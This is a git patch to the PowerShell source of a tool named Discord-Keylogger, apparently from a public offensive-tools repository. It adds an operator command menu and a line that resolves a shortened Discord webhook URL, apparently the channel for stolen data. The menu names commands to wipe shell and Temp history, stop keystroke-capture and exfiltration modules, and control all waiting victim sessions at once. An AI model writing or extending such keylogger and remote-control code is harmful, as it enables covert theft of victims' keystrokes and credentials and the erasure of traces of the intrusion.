From fd3f405feb57ccfe752deb71226dae007da754c6 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Tue, 25 Jun 2024 12:01:50 +0000 Subject: [PATCH] Update main.ps1 --- Discord-Keylogger/main.ps1 | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/Discord-Keylogger/main.ps1 b/Discord-Keylogger/main.ps1 index afa4d5b..cc8166e 100644 --- a/Discord-Keylogger/main.ps1 +++ b/Discord-Keylogger/main.ps1 @@ -1,4 +1,22 @@ +# ===================================================================================================================================================== +<# + ExtraInfo: Get a list of further info and command examples + + Cleanup: Wipe history (run prompt, powershell, recycle bin, Temp) + + Kill: Stop a running module (eg. Keycapture / Exfiltrate) + + ControlAll: Control all waiting sessions simultaneously + + ShowAll: Control all waiting sessions simultaneously + + Pause: Pause the current authenticated session + + Close: Close this session + +#> +# ===================================================================================================================================================== # shortened URL Detection if ($dc.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $dc = (irm $dc).url}